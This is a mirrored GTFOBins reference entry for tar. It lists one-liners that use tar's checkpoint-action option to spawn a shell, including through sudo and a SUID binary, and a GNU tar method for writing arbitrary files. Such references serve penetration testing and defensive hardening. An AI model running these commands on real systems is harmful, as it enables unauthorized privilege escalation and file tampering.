mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
17 lines
554 B
Markdown
17 lines
554 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
sudo-enabled:
|
|
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
suid-limited:
|
|
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
file-write:
|
|
- description: This only works for GNU tar.
|
|
code: |
|
|
LFILE=file_to_write
|
|
TF=$(mktemp)
|
|
echo data > "$TF"
|
|
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
|
|
---
|